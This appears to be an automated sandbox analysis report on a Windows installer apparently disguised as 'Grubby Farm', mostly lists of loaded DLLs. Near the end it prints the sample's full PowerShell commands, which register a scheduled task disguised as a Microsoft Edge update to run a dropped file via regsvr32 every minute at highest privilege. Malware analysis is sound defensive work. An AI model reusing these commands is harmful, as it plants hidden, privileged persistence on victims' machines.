Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Grubby Farm_is1

Jump to behavior

Source: 8n26gvrXUM.exe

Static file information: File size 1479422 > 1048576

Source:

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"

Source: C:\Windows\System32\regsvr32.exe

Code function: 9_2_00007FFDA338A040 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,RtlFreeHeap,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose,

9_2_00007FFDA338A040

Source: _isdecmp.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: is-O7IBF.tmp.7.dr	Static PE information: real checksum: 0x0 should be: 0x131baa
Source: _isdecmp.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: is-66O79.tmp.7.dr	Static PE information: real checksum: 0x55cb should be: 0x1af86a
Source: 8n26gvrXUM.exe	Static PE information: real checksum: 0x0 should be: 0x171e8d
Source: _setup64.tmp.2.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: 8n26gvrXUM.tmp.6.dr	Static PE information: real checksum: 0x0 should be: 0x122532
Source: _setup64.tmp.7.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: 8n26gvrXUM.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x122532

Source: is-66O79.tmp.7.dr

Static PE information: section name: .xdata

Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_02D81E2C push ds; iretd	9_2_02D81E32
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_02D81DCA push ds; iretd	9_2_02D81E32
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34353E15 push ebx; retn 000Dh	9_2_00007FFD34353E2A
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD3435C194 push eax; ret	9_2_00007FFD3435C1AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFD34526998 pushad ; retf	9_2_00007FFD34526999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD3423D2A5 pushad ; iretd	10_2_00007FFD3423D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFD3435792B push ebx; retf	10_2_00007FFD3435796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD3422D2A5 pushad ; iretd	12_2_00007FFD3422D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD343480CB push ebx; ret	12_2_00007FFD3434816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD3434AFF2 push eax; ret	12_2_00007FFD3434B029
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD34416DCB push ecx; iretd	12_2_00007FFD34416DCC

